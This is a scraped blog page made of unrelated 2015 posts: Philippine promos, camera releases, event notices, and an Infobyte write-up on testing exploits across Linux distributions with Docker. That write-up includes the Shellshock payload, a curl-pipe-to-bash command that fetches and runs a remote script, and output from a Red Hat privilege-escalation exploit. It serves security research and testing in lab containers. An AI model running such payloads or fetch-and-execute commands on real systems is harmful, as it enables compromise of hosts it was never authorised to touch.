Angelica Castro to represent PH in the global search for Jose Cuervo’s next Don of Tequila

Angelica Castro will represent the Philippines for Jose Cuervo's next Don of Tequila global search 


Out of 10 hopefuls for the next Don of Tequila, Angelica wins the heart of the judges and the crowd during Jose Cuervo's Dons of Tequila Philippines Grand Finals. The event was held at URBAN Kitchen BGC 

Angelica Castro is Jose Cuervo PH Don of Tequila. She'll represent the country for Don of Tequila Global Search

Here's the official press release:

  25 July 2015  Manila, Philippines – After tough national finals, Jose Cuervo has named Angelica Castro as the winner of the Philippine leg of the global campaign Dons of Tequila.Angelica Castro will now join sixteen (16) other bartenders from across the world in the grand final event at La Rojena, Mexico.   

“We saw some fantastic bartenders in this competition, but Angelica Castro showed the true grit, personality, and creativity that encompasses what it means to be a don,” says Charles Wright, Senior Commercial Manager – Southeast Asia and India for Jose Cuervo International. “Angelica Castro truly deserves the honor of being the Philippine Don of Tequila!”

In the first challenge of its kind, Angelica Castro will compete for the chance to be named the next Don of Tequila and win the prize of a lifetime: fly to Tequila, Mexico where they’ll get to harvest their own crop of agave on the Jose Cuervo estate, blend it into a unique tequila and win the batch, labelled under their own name.  “I’m confident about Angelica Castro’s chances in the global finals of Dons of Tequila,” quips Divine Lee, celebrity and Dons of Tequila Mentor. “She definitely stood out, and he/she showed some real cojones in the finals. We can’t wait to send her over to Mexico to battle it out for the Philippines!”  

Jose Cuervo’s Dons are the real heroes of tequila – people, past and present, who epitomise the expert craft, passion and bravery required to make the world’s most popular tequila. Their unwavering belief in quality and the spirit of tequila – true bonds, real friendship and good times – is what keeps the brand’s 250 years of heritage fresh and relevant. The bartender who is named the next Don in the global search must embody all of these qualities for a chance to follow in the footsteps of some of the world’s greatest legends of tequila.    “Filipinos have always been known for their passion and their creativity,” shares Genrev Bacasno, Dons of Tequila Mentor and second runner-up at the 23 rd Annual World Bartender Championship. “That finals showdown only further proves that Filipino bartenders are more than primed to conquer the world stage.”  

“Jose Cuervo’s support for Filipino mixologists elevates the industry,” adds Jerry Miranda, Dons of Tequila Mentor and Diageo Reserve World Class 2014 winner. “A competition like this sets standards even higher for the local bartending scene.”  

The Philippine winner will go up against the best-of-the-best in the Jose Cuervo Distillery, La Rojeña, in Tequila, Mexico for a final global showdown where they will be put to the ultimate test in front of the true Dons of Tequila. Aside from the Philippines, the Dons of Tequila competition is running in the following countries: France, Italy, Switzerland, Germany, Greece, UAE, Brazil, Colombia, Peru, Puerto Rico, Argentina, Chile, New Zealand, Korea, Japan and Cyprus.   
  
   Family owned for ten generations, Jose Cuervo is made using 250 years of cultivating, harvesting, blending and tasting expertise. Jose Cuervo Gold and Silver are distilled with rigorous standards, to create the taste and character fit for a Don.   For more information about the competition and of all things Jose Cuervo, visit www.DonsofTequila.com. The website features the stories of the current Dons of Tequila, as well as a selection of drinks fit for a Don, crafted and demonstrated by head barmen from La Rojeña.   

Angelica Castro truly made us proud on this feat as she represents the Philippines on Jose Cuervo’s global search for the next Don of Tequila.

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

Cross Distribution Exploit Testing [SPANISH]

Introducción:

Buscando una manera fácil de hacer testing sobre el proceso de instalación de Faraday
http://github.com/infobyte/faraday en distintas distribuciones.


Es uno de los procesos mas complicados y críticos de una herramienta. Es importante que el proceso sea fácil y funcione sin inconvenientes para que los usuarios solo se dediquen a usar la herramienta y no pierdan tiempo valioso en la instalación.

Gracias a esto nos topamos con Docker es similar a un chroot con esteroides.

Docker es un proyecto que automatiza el despliegue de aplicaciones dentro de contenedores de software, proporcionando una capa adicional de abstracción y automatización de virtualización a nivel de sistema operativo en Linux. Docker utiliza características de aislamiento de recursos del kernel de Linux, tales como cgroups y namespaces para permitir que "contenedores" independientes se ejecuten dentro de una sola instancia de Linux, evitando la sobrecarga de iniciar y mantener máquinas virtuales.

El proceso que desarrollamos es bastante simple tomando una lista de distribuciones:

1. Generamos un docker
2. Instalamos Faraday
3. Nos conectamos por SSH al container exportando la X y ejecutamos la aplicación grafica (GUI QT)

Si alguno de los procesos fallaba, evaluamos cual fue el problema y efectuábamos el patch correspondiente.

Este proceso hoy es utilizado dentro de nuestro sistema de integración continua.

Cross Distribution Exploit Testing:

Utilizando esta misma implementación podemos usarlo para realizar una pruebas de explotación en distintas distribuciones para evaluar distintos escenarios y lograr que nuestros exploits sean mas robustos :)
No todas las vulnerabilidades pueden ser probadas utilizando esta tool ya que problemas relaciones con kernel no pueden ser explotados porque docker no es un sistema de virtualización, vulnerabilidades simples como file permission, file race condition, environment variable code injection, etc.

La herramienta contiene los siguientes elementos:

• docker_build.py: Este script se encarga de generar las imagenes de cada distribución y dispara docker_launch.py.
• docker_launch.py: Es el que finalmente se conecta conecta por SSH y ejecuta nuestro comando en el container seleccionado.
• images.txt: Lista de imagenes a utilizar.
• extras/: Librerias y Dockerfile fija base que se usa para la generación de las imagenes
• root/: Aquí se encuentran claves privadas para la conexión de ssh, solo necesario para pruebas de GUI

Caso 1 - Shellshock

Un ejemplo simple para probar es shellshock:

$ ./docker_build.py -c "env x='() { :;}; echo vulnerable' bash -c \\\"echo this is a test\\\""
Start build docker: debian:7.3
..

Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3

./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t fae1bc04-b514_debian:7.3

['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.93', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']

vulnerable

this is a test

Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10

./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t a07132a4-af14_ubuntu:14.10

['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.94', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']

this is a test

Esto creo 2 imagenes (debian7.3, ubuntu 14.10) y por cada imagen ejecuto el exploit de CVE-2014-6271

Podemos utilizar un script para tenerlo mas ordenado:
$ ./docker_build.py -c "cd build && ./shellshocker.sh" #docker_build.py copia en la imagen todo el contenido de "." en directorio ./root/build

Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3

CVE-2014-6271 (original shellshock): VULNERABLE

./shellshock_test2.sh: line 17:    29 Segmentation fault      shellshocker="() { x() { _;}; x() { _;} <<a; }" bash -c date 2> /dev/null

CVE-2014-6277 (segfault): VULNERABLE

CVE-2014-6278 (Florian's patch): VULNERABLE

CVE-2014-7169 (taviso bug): VULNERABLE

CVE-2014-7186 (redir_stack bug): not vulnerable

CVE-2014-7187 (nested loops off by one): not vulnerable

CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable

También alguna implementación mas automatizada, con la excepción que usamos la opcion -i para pasarle una lista de images a ejecutar.

$ ./docker_build.py -c "curl https://shellshocker.net/shellshock_test.sh | bash" -i images.txt

En caso de querer volver a probar algo especifico sobre algún container basta con correr:
$ docker ps -a #verificar cual es la image generada y utilizarla con docker_launcher en la opción -t
$ ./docker_launcher.py -c "whoami" -t c92d6bf7-d559_debian:7.3

Caso 2: Redhat Local Privilege Escalation CVE-2015-(3245,3246):

Hace pocos días publicaron dos vulnerabilidades que pueden ser utilizadas para elevación local de privilegios en Redhat 6 y 7.

CVE-2015-3245 userhelper chfn() newline filtering
CVE-2015-3246 libuser passwd file handling

Probemos esta vulnerabilidades en las siguientes distribuciones rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20 :

$ ./docker_build.py -i redhat_images.txt  -d extras/docker/Dockerfile.redhat -c id # En este caso utilizamos un Dockfile especial que ejecuta directamente el exploit (roothelper.c)

Distros: ['rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20']
Start build docker: rhel6.5
...
Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable
...

Demo:

Clean:

Después de varias pruebas no olvidemos parar los containers y borrarlos:
$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)

De ser necesario también las imagenes:
$ docker rmi $(docker images -q)

Tool:

El código se encuentra disponible en github en:
http://github.com/infobyte/docker_build

To-Do:

Realiza un proceso similar utilizando Vagrant de esta manera podríamos probar cualquier tipo de vulnerabilidades ya que seria un entorno de virtualización completo.

Espero que les ayude para realizar exploits mas robustos y tal vez algún developer para probar su herramienta frente a distintas distribuciones.

Gracias Andres por la ayuda!

Cross Distribution Exploit Testing

Introduction:

We were looking for an easy way to do testing for the installation of our tool, Faraday
https://github.com/infobyte/faraday with different distributions.

We wanted to do this because the installation process is normally one of the most complicated and critical processes of any new tool being implemented. It is important that the process is easy and that everything works without any hiccups so that users can get started using the tool ASAP and don't lose valuable time during the installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent "containers" to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines

The process we developed is pretty simple, in which we use a simple list of distributions.

1. We generate a Docker
2. We install Faraday
3. We connect using the SSH to the container, exporting the X and we execute the graphic application (GUI QT)

If one of the processes doesn't work, we can evaluate what was the cause of the problem and we make a corresponding patch to remedy the problem .

We are using this process daily in our own continuous-integration system.

Cross Distribution Exploit Testing:

Using the same implementation, we can use it to do some exploitation tests in different distributions. This allows us to evaluate different scenarios and hopefully helps us make our exploits a bit more robust :)

Not all the vulnerabilities can be tested using this tool, because kernel's related problems can
't be exploited because Docker isn't a virtualization system. This includes a few simple vulnerabilities such as file permission, file race condition, environment variable code injection, etc.

The tool contains the following elements:

• docker_build.py: This script function is to generate images of each distribution and run docker_launch.py.
• docker_launch.py: This is the one that finally connects through the SSH and executes our command in the selected container.
• images.txt: A list of images to use
• extras/: Libraries and base Dockerfile used for generation of the images.
• root/: Here, we find private keys for the ssh connection, which are necessary for testing out the GUI tests.

Case 1 - Shellshock:

A simple example to try would be shellshock:

$ ./docker_build.py -c "env x='() { :;}; echo vulnerable' bash -c \\\"echo this is a test\\\""

Start build docker: debian:7.3
..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t fae1bc04-b514_debian:7.3
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.93', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t a07132a4-af14_ubuntu:14.10
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.94', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
this is a test

This creates 2 images (debian7.3, ubuntu 14.10) and for each image, you have to execute the exploit  CVE-2014-6271

 We can utilize a script to make it a little more organized;

$ ./docker_build.py -c "cd build && ./shellshocker.sh" #docker_build.py copy in the images all the content "." in the directory ./root/build

Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3

CVE-2014-6271 (original shellshock): VULNERABLE

./shellshock_test2.sh: line 17:    29 Segmentation fault      shellshocker="() { x() { _;}; x() { _;} <<a; }" bash -c date 2> /dev/null

CVE-2014-6277 (segfault): VULNERABLE

CVE-2014-6278 (Florian's patch): VULNERABLE

CVE-2014-7169 (taviso bug): VULNERABLE

CVE-2014-7186 (redir_stack bug): not vulnerable

CVE-2014-7187 (nested loops off by one): not vulnerable

CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable

Also, for a more automated implementation, with the exception that we use the option -i in order to go to a list of images to execute.

$ ./docker_build.py -c "curl https://shellshocker.net/shellshock_test.sh | bash" -i images.txt

In case you want to try testing again something specific for a container all you need to do is run:

$ docker ps -a # verify which is the image generated and use this id with docker_launcher in the option -t

$ ./docker_launcher.py -c "whoami" -t c92d6bf7-d559_debian:7.3

Case 2: Redhat Local Privilege Escalation CVE-2015-(3245,3246):

Last week two vulnerabilities were released that can be use to do a local privilege escalation on

redhat 6 and 7:

CVE-2015-3245 userhelper chfn() newline filtering
CVE-2015-3246 libuser passwd file handling

Let's try again the tool against this vulnerability in the following distribution rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20 :

$ ./docker_build.py -i redhat_images.txt  -d extras/docker/Dockerfile.redhat -c id # In this scenario I directly use a specific dockerfile that runs the exploit (roothelper.c)

Distros: ['rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20']
Start build docker: rhel6.5
...
Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable
...

Demo:

Clean:

After a few tests, it's important not forget to stop the containers and delete them:

$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)

You have to for the images as well:
$ docker rmi $(docker images -q)

Tool:

The code can be found on github:
http://github.com/infobyte/distro_checker

To-Do:

Doing a similar process using Vagrant, we would be able to try out all kinds of vulnerabilities, as that would be a complete virtualization setting.

We hope this helps everyone in the need test their tools across a wide range of  distributions, from researchers to developers their code.

Thanks Andres for the support!

JOIN ITC, GOOGLE AND CI&T FOR THE WVEF TECH CHALLENGE

Join ITC, Google and CI&T for the WVEF Tech Challenge to help women entrepreneurs trade more globally

Is your software skills and techie flair challenge-ready to bring you to international competition?

The International Trade Centre (ITC), Google, and CI&T have launched the WVEF Tech Challenge 2015, calling on software developers and other IT and graphic specialists to help create a digital platform for women-owned businesses (WOBs) across the world.

The Tech Challenge forms part of this year’s Women Vendors’ Forum and Exhibition (WVEF) – ITC’s annual event connecting WOBs to markets – to be held in São Paulo, Brazil, from 2-3 September 2015 in partnership with Apex-Brasil, and a call to action to help 1 million WOBs enter international markets by 2020.

With the WVEF Tech Challenge, ITC, Google and CI&T want ideas to develop a digital tool that can help corporations include more women-owned businesses – especially from developing countries – in their supply chains. The Tech Challenge will result in a web or a mobile application on which women-owned enterprises can register their businesses to increase their visibility to potential partners across the world.

Everyone – from software programmers and developers involved to IT architects and graphic designers – are invited to join the challenge (in teams of maximum 3 people) and register between now and 31 July 2015 to create a future in which women-owned businesses can participate equally in the global marketplace.

The applying companies and participants must have experience with mobile and web development, a good understanding of Google tools and Android OS, experience with social-media APIs and web services, and knowledge about business culture. Up to five finalists will be invited on an all-expense paid trip to São Paulo in September where they will present their ideas and a winner will be announced during WVEF.

The WVEF Tech Challenge is designed to address the need among multinationals and larger enterprises to engage with companies owned by women. However, WOBs are difficult to locate and identify. The WVEF Tech Challenge therefore wants your help to solve this issue in a creative and innovative way.

For further details on the Tech Challenge and to sign up, please visit: www.intracen.org/wveftechchallenge 

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

2015 July GrabCar Promocode UMBRELLA for Manila equals 100-Peso off!

GrabTaxiPH renews their promo for GrabCar(Sedan) and GrabCar Plus(Premium) this July 2015 with a new promo code to let the commuters enjoy!

Starting today, July 22, up to July 31st, you can getPhp100 off for 10 rides from July 22-31! Just key in the promo code UMBRELLA each time you book a trip.

This promo code is valid only for Metro Manila users of GrabCar (Sedan) and GrabCar+ (Premium) for up to 10 rides. UMBRELLA is the latest promo code from GrabTaxiPH for GrabCar and GrabCar+ users this July.

So what are the perks of having the latest GrabCar / GrabCar Plus promo code for July? Easy. The UMBRELLA promo code for GrabCar/ GrabCar+ from GrabTaxiPH is just perfect for the rainy days, reminding the rider/commuter to bring it, at the same time save money while commuting.

GrabCar and GrabCar Plus both offer fixed fare rate. The last time we did, we got a Toyota Camry. We had a comfortable ride despite the heavy traffic. What's the best ride you had lately with GrabCar or GrabCar+? Share it by commenting below.

Oh wait... we have to go, and GrabCar our way to the office!

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

SAMSUNG NX500 - Capturing images of Dynamism and Adventure

When capturing images of dynamism and adventure you need a camera that takes crisp images. Thus, Samsung's latest NX camera, Samsung NX500 is perfect for the job

Samsung NX500 us loaded with enhancements to help the shooter just focus on his subject(s). It's also boast 28 MP stills using a sensor (APS-C) that can also be found on DSLRs today. NX500 is capable of using other NX lens based on your shooting needs.

Here's the official news release of Samsung NX500 to know more about its features:

Life on the edge, with its high-octane moments that test the limit of speed and endurance, deserves to be captured in order to be relived. For the adventurous soul who enjoys the dynamism of life and wants to savor each moment, a revolutionary camera like the Samsung NX500 is a must.

Among the many cameras in the market today, nothing comes close to the Samsung NX500. Boasting the same DNA as the critically acclaimed Samsung NX1, the Samsung NX500 is a mirrorless compact camera with top-in-its class specifications, the Samsung NX500 boasts cutting-edge features that take the highest resolution photos at fast speed, capturing pivotal moments with great precision. Its revolutionary shooting & focus speed, superb image, and advanced usability make it the ultimate camera for all kinds of photographers and serious hobbyists.

With its fast and light adapting features, it is also the perfect choice for those who love the outdoors, as it effortlessly captures rich details of those challenging, fast-paced moments. Whether it’s a shot of your daughter gliding on a jet ski, playing Frisbee with your dog, or your family toasting marshmallows at a dark campsite, you can trust the Samsung NX500 to capture the experience to the last detail, even when taken at challenging speeds.

The core feature of the camera is the 28.2 megapixel BSI APS-C Sensor that produces vivid and crisp images. It has the first back-side illuminated APS-C sensor for a wider dynamic range and richer gradation. At single shooting mode, it can produce a 14-bit RAW output – definitely the highest resolution.

The Samsung NX500 comes with the DRIMe 5 Imaging Processor, a powerful engine that processes 2.8 times faster than its predecessor, bringing images to life with superior color production and enhanced JPEG image quality.

Its blazing fast All New Hybrid Autofocus System with on-surface phase detection makes fast speed shooting and precise focusing possible. The fastest High Speed Drive with AF lets you capture decisive moments with 9FPS continuous shooting. An added bonus is the Samsung Auto Shot with 205 AF Phase Detect that intuitively allows you to take the exact photo you want – like that very moment when your son hits the ball with the bat, or the split second when everyone in the group jumps for that posterity shot at the beach. Its motion detection logic triggers capture automatically, creating the same effect as 60 FPS continuous shooting.

Sharing photos can be done instantly with the Samsung NX500’s wireless connection feature that makes it easy to transfer images from one device to another without need for a WiFi connection. Sharing photos of your epic vacation is a cinch on any social media platform.

The Samsung NX500’s video recorder does not disappoint with its 4K UHD video recording capability and an interval capture mode that lets you take pictures while shooting a video. Moreover, you can take shots from different angles with the Tilt & Flip-Up screen that doesn’t only provide brighter vision through the FVGA AMOLED but is also suitable for taking selfies.

With the Samsung NX500, Samsung takes one step closer to another era of photography where gamechanging features become de rigeur. When it comes to capturing life’s greatest moments, you can trust the Samsung NX500 to help you take the shot of your dreams.

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

ONE CHAMPIONSHIP Announces 6 More Electrifying Events For 2015

ONE CHAMPIONSHIP™ ANNOUNCES SIX MORE ELECTRIFYING EVENTS FOR 2015. 

Here the official press release of the upcoming fights under One Championship from September to December of 2015

Photo from: http://www.onefc.com/

(ADDITIONAL EVENTS IN NEW COUNTRIES TO BE ANNOUNCED LATER)

Last July 16, 2015 in Singapore, the Asia’s largest and the world’s most exciting mixed martial arts organization, ONE Championship™ (ONE) was thrilled to announce the dates for six upcoming events in six different cities this year, headlined by our roster of elite international champions and local mixed martial arts heroes.

ONE: DYNASTY OF CHAMPIONS (SHANGHAI), 1st of September in Shanghai, China

ONE: ODYSSEY OF CHAMPIONS, 27 September in Jakarta, Indonesia

ONE: TIGERS OF ASIA, 9th of October in Kuala Lumpur, Malaysia

ONE: BATTLE AT THE GATES, 7th November in Macau, China

ONE: PRIDE OF LIONS, 13th of November in Singapore
ONE: SPIRIT OF CHAMPIONS, 11 December in Manila, Philippines

In addition to this, ONE Championship is set to host more events in new countries across Asia this year which will be announced shortly. The rapid growth of ONE Championship has significantly increased the demand for world-class international entertainment in Asia, and the organization is ready to deliver.

CEO of ONE Championship™ Victor Cui, stated, “Early in 2015, we knew that this year would be another amazing year with exciting growth for ONE Championship as we continue to expand at an incredibly rapid pace, bringing our signature brand of world-class MMA action into more cities in Asia.  ONE has achieved a historic milestone by becoming the first major mixed martial arts organization to hold multiple events in mainland China. China is the most populous country in the world and is rich in martial arts history and now fans in Shanghai and Macau can look forward to witnessing world class mixed martial arts that has already captivated fans from all around the world!”

Cui added, “We will also return to our favourite cities in Asia -- Jakarta, Kuala Lumpur, Singapore and Manila -- with even greater shows and blockbuster fight cards that will ignite stadiums and get fans screaming for more!”

ONE Championship will announce further ground-breaking partnerships, explosive fight cards and main events as the demand for world-class mixed martial arts action hits a fever pitch among fight fans all across Asia.

For more updates on ONE Championship™, please visit www.onefc.com and follow on Instagram and Twitter @ONEFCMMA, Facebook at www.facebook.com/ONEFCMMA and Weibo at http://www.weibo.com/onefc.

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

We´re Back in Black (Hat)!

We are more than excited to announce that Infobyte LLC will be presenting at this year´s Black Hat Security Conference.  This behemoth on the security conference calendar will from August 1st to the 6th in Mandalay Bay in Las Vegas. 

Year 18 of Black Hat starts off with four days of intense training (August 1st-4th), then is followed by two days of ¨the main event¨ with over 100 sessions and talks from the leading lights in the IT security space.  

Infobyte was selected to present at Black Hat´s prestigious Arsenal. This event is a tool/ demo area where the open source community and independent researchers get to show off their new tools and ¨weapons¨ to fend off cyber attacks.

Infobyte LLC will be presenting for the 3rd time at Arsenal. In 2010, we presented Evilgrade, a modular framework that allows the user to take advantage of poor upgrade implementations by infecting fake updates. Then the following year (2011), we presented for the first time, Faraday, the first IDE for collaborative pentests.

This year we´re back! Infobyte´s own Federico Kirschbaum will be showing all Faraday's newest features and if you haven´t been keeping up there´s been A LOT of changes to put it mildly. There are more plug-ins then ever, a sexy dashboard and automatic reporting saving you time.

We will be presenting August 6th from 15:30 - 18:00 at the Breakers DEJK station.

If you´re going to be in Sin City for either Black Hat or DefCon, we´d love to meet-up! We hope you can come by to check out the presentation and chat for a bit. If you can´t make it to Arsenal but still want to meet up, ping us at communications @infobytesec.com and we´d be happy to set up a time to talk or answer any questions you might have.  Hope to see everyone there!

¡INFOBYTE estará en la próxima Black Hat!

Estamos contentos de anunciar que Infobyte LLC estará presente en la próxima Black Hat security conference. La conferencia se llevará a cabo el próximo 1 a 6 de Agosto en el Mandalay Bay en la ciudad de Las Vegas. 

La edición 18th de este evento comienza con cuatro días de intensos entrenamientos (agosto 1-4), seguido por el evento principal de dos días que incluye más de 100 sesiones que incluyen: Salón de Negocios, Arsenal, Premios Pwnie, y más (agosto 5-6).

Infobyte ha sido seleccionado para participar del prestigioso Arsenal. Esto es una área donde researchers independientes y la comunidad de opensource (código abierto) demuestras sus "armas" para defenderse de los ataques cibernéticos.

Infobyte LLC se presenta por tercera vez en el Arsenal. En 2010, presentamos Evilgrade, un marco modular que permite al usuario tomar ventaja de las implementaciones de actualizaciones mediante la infección de actualizaciones falsas. Luego al año siguiente (2011), se presentó por primera vez, Faraday, el primer IDE para pentests colaborativos.

Este año estamos de vuelta! Federico Kirschbaum, fundador y CTO de Infobyte, estará mostrando las características más recientes, que son muchas. Para el que no ha estado al tanto, se encontrará con cambios que incluyen más plug-ins, un dashboard totalmente renovado e informes automáticos cada vez más completos, entre otros.

La presentación será el 06 de agosto de 15:30 - 18: 00 en la estación Breakers DEJK.

Si estás va a ser en la ciudad del pecado, ya sea para Black Hat o DefCon, nos encantaría reunirnos! Esperamos que puedan venir a revisar la presentación y charlar un poco. Para el que no pueda asistir a Arsenal pero todavía quiera reunirse, puede contactarnos a communications@infobytesec.com y estaremos encantados de coordinar un tiempo para hablar o responder a cualquier consulta. 

Esperamos verlos a todos allí!

Samsung and Xander Angeles kick-off their partnership: Relentless. Forward. Progress.

Relentless. Forward. Progress. 3 Words that best describe his latest collaboration and partnership with Samsung Philippines as he uses his Photography skills through an unconventional method. Not only that, Xander changes his habits and lifestyle as he inspired himself to be health-conscious as well. 

Here's the official news release :

Manila, Philippines – July 10, 2015 – Renowned and sought after photographer Xander Angeles together with Samsung NX500 opens a photo exhibit that aims to showcase athletes, celebrities, and personalities relentlessly pursuing their passions, moving forward in doing what they love, and progressing to realize their dreams.

Can you name these personalities pictured by Xander Angeles a Samsung NX500?

Held at The Atrium, SM Aura Premier, Relentless. Forward. Progress. is Xander’s avenue that brings to life his inspiration with the hope of inspiring others with the help of the Samsung NX500. Notable personalities like Ryan Agoncillo, Drew Arellano, Erwan Huessaff, Mateo Guidicelli, Benjamin Alves, Solenn Heussaff and Bianca King, are all featured in Xander’s photographs shot by the Samsung NX500.  All are active lifestyle enthusiasts who are constantly reinventing their game – much like Xander and the Samsung NX500.

Samsung NX500. White Beauty with 28MP and 4k video capture

Relentless. Forward. Progress. was inspired by Xander’s personal and professional evolution as a photographer and artist. His journey involved some lifestyle change that led him to become more conscious about his health and wellness. This pushed him to become physically active. He found Samsung NX500, a light and compact yet powerful camera to serve as his partner in reaching his goal to inspire others in finding ultimate satisfaction and dedication to push themselves to their physical limits. 

The backpanel of Samsung NX500. Touch screen for easy access of  different camera functions

A professional fashion photographer for the past 15 years, Xander has done photography for various brands across the Philippines and Southeast Asia. Not content with what he was doing, he began to introduce more action and greater dynamism into his photography, coinciding with his newly embraced fast-paced and active lifestyle.

Xander’s passion to relentlessly progress is embodied by the Samsung NX500. The Samsung NX500 boasts game-changing features such as a 28 megapixel APS-CMOS sensor, cutting edge autofocus that can track fast moving objects, 4K ultra high definition video recording and Samsung’s latest DRIME 5 image processor, all of which allowed Xander to effortlessly capture the active lifestyle of his subjects.

“When I began thinking of a concept for this exhibit, I wanted it to be inspiring and very close to my heart. I decided to do something different and focus on the challenging  passions of athletes, celebrities and personalities. I wanted to capture the spirit of adventure and speed, such as people running, doing extreme sports, or testing the limits of their physique. Fortunately, the Samsung NX500 allowed me to take rich and vivid images of my subjects in action. It was good to see people having fun, doing what they love the most and I am very happy with the resulting photos taken,” Xander shares.

Eager to share lessons from his personal transformation with aspiring photographers who look up to him, Xander suggests that they invest in a camera like the Samsung NX500 which is powerful and agile yet extremely user friendly and allows them to define their own style. “There is no right or wrong in art, so don’t be afraid to take the shots you like. Don’t be afraid to present your vision and ideas to others. ” he urges.

Samsung Category Manager for Digital Imaging Adriene Rivera with World-class Pro Photographer Xander Angeles

 “We at Samsung are honored to be a part of Xander’s aim to spread such a wonderful message that could inspire others to go further and push themselves beyond their comfort zones. Working with an incredible photographer like Xander proved that creative ideas, aided with the right material and equipment can send a very powerful message. With the Samsung NX500, these photos are now brought to life,” Samsung Category Manager for Digital Imaging , Adriene Rivera concluded.

For both Samsung and Xander Angeles, life’s many adventures are definitely worth celebrating.

How 'bout you? How do you plan to move forward and capture your own adventure?

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

Max's brings back Chicken All-You-Can Promo for 2015 at PHP229 only

Celebrating its 70 years of providing delicious "Sarap to the bones" fried chicken to Filipinos, Max's Fried Chicken / Max's Restaurant is back with CHICKEN ALL-YOU-CAN promo this 2015. Unlimited serving of Max's famous fried chicken, available starting July 17 for only PHP 229.00

The first Chicken All-You-Can Promo was launched 5 years ago, during Max's Restaurant 65th Anniversary. And it's been a hit since then, as fans wait for the announcement year after year. Max's Chicken ALL-YOU-CAN promo can be availed starting July 17, 2015. It's spread out for 5 Fridays: July 17, 24,31 then August 7,14, 2015 making each Friday a Chicken ALL-YOU-CAN day.

So how does Max's unlimited serving of chicken works? Here's the mechanics for Max's 2015 Chicken All-You-Can Promo

Mechanics:

• Max’s Quarter Chicken will be served with 1 glass of Pepsi products
• Valid for dine in only from 6:00 PM to 10:00 PM
• Not available for takeout, delivery, bulk order and functions.
• Not valid in conjunction with any other ongoing promos and discounts
• Chicken will be served after each piece has been consumed
• Strictly no sharing and no leftovers
• No reservations. First come, first serve policy
• Valid in all Max’s branches in the Philippines only

Max's Restaurant unlimited chicken promo for 2015 can be availed at any Max's branch nationwide. It's(Unlimited Chicken All-You-Can Promo) ready for consumption from 6:00PM to 10:00pm only. 

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

Rags2Riches, Fashion Prodigy with a Heart

Aside from the old adage “from rags to riches”, I never thought this phrase would be a byword in fashion arena of today. What am I talking about? It is about a social enterprise company named Rags2Riches that revolutionized to what we have as a fashion statement of the modern day.

